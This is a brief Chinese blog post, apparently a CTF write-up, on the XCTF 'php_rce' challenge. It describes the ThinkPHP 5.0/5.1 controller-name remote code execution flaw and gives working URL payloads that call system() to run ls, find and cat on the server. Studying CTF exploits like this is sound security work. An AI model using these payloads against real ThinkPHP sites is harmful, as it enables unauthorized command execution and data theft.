
XCTF web php_rce (thinkphp)
发布日期:2021-05-07 06:19:21
浏览次数:16
分类:精选文章
本文共 434 字,大约阅读时间需要 1 分钟。
thinkphp5.0和5.1由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受
影响的版本包括5.0和5.1版本。测试是否可以getshell
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls
成功返回信息,确定存在漏洞
接着查询有flag的文件
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"
查看文件信息
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag"
发表评论
最新留言
留言是一种美德,欢迎回访!
[***.207.175.100]2025年04月16日 02时51分39秒
关于作者

喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
hp工作站z8装Linux,惠普Z8G4双路最小工作站
2023-01-24
html上传图片直接保存到数据库中,Editor上传图片路径存入数据库中怎么弄?
2023-01-24
html游戏玩不了,WinXP网页游戏玩不了怎么办有哪些解决方法
2023-01-24
html转jsp_JSP详解
2023-01-24
iphone打字怎么换行_手持iPhone?你可能并不知道的小技巧!
2023-01-24
jaccard相似度_自然语言处理之文本相似度计算
2023-01-24